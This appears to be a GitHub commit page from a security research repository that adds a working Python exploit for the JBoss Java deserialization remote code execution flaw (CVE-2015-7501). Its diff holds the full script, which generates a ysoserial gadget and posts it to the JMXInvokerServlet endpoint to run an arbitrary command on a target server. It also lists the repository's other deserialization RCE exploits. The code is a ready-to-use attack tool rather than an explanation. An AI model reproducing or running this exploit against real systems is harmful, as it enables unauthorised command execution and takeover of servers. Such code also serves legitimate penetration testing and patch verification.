Added JBoss RCE exploit (CVE-2015-7501)

Coalfire-Research · Feb 1, 2018 · 3390f2f · 3390f2f
1 parent c574129
commit 3390f2f
Show file tree

Hide file tree

Showing 5 changed files with 69 additions and 1 deletion.
diff --git a/Cisco_Prime/README.md → CiscoPrime/README.md b/Cisco_Prime/README.md → CiscoPrime/README.md
diff --git a/Cisco_Prime/cisco_prime_rce.py → CiscoPrime/cisco_prime_rce.py b/Cisco_Prime/cisco_prime_rce.py → CiscoPrime/cisco_prime_rce.py
diff --git a/JBoss/README.md b/JBoss/README.md
@@ -0,0 +1,6 @@
+# JBoss Java Deserialization RCE (CVE-2015-7501)
+
+Exploit for the JBoss Java Deserialization RCE (CVE-2015-7501)
+
+The python script uses [ysoserial](https://github.com/frohoff/ysoserial) to dynamically generate the payload. Therefore java is required as well.
+
diff --git a/JBoss/jboss.py b/JBoss/jboss.py
@@ -0,0 +1,61 @@
+#! /usr/bin/env python2
+
+# Jboss Java Deserialization RCE (CVE-2015-7501)
+# Made with <3 by @byt3bl33d3r
+
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+import argparse
+import sys, os
+#from binascii import hexlify, unhexlify
+from subprocess import check_output
+
+ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
+ysoserial_path = None
+
+parser = argparse.ArgumentParser()
+parser.add_argument('target', type=str, help='Target IP')
+parser.add_argument('command', type=str, help='Command to run on target')
+parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
+parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
+
+if len(sys.argv) < 2:
+    parser.print_help()
+    sys.exit(1)
+
+args = parser.parse_args()
+
+if not args.ysoserial_path:
+    for path in ysoserial_default_paths:
+        if os.path.exists(path):
+            ysoserial_path = path
+else:
+    if os.path.exists(args.ysoserial_path):
+        ysoserial_path = args.ysoserial_path
+
+if ysoserial_path is None:
+    print '[-] Could not find ysoserial JAR file'
+    sys.exit(1)
+
+if len(args.target.split(":")) != 2:
+    print '[-] Target must be in format IP:PORT'
+    sys.exit(1)
+
+if not args.command:
+    print '[-] You must specify a command to run'
+    sys.exit(1)
+
+ip, port = args.target.split(':')
+
+print '[*] Target IP: {}'.format(ip)
+print '[*] Target PORT: {}'.format(port)
+
+gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
+
+r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
+
+if r.status_code == 200:
+    print '[+] Command executed successfully'
+
diff --git a/README.md b/README.md
@@ -8,4 +8,5 @@ Currently this repo contains exploits for the following vulnerabilities:
 - OpenNMS Java Object Deserialization RCE (No CVE ?)
 - Jenkins CLI RMI Java Deserialization RCE (CVE-2015-8103)
 - Jenkins Groovy XML RCE (CVE-2016-0792)
-- Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)
+- Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)
+- JBoss Java Deserialization RCE (CVE-2015-7501)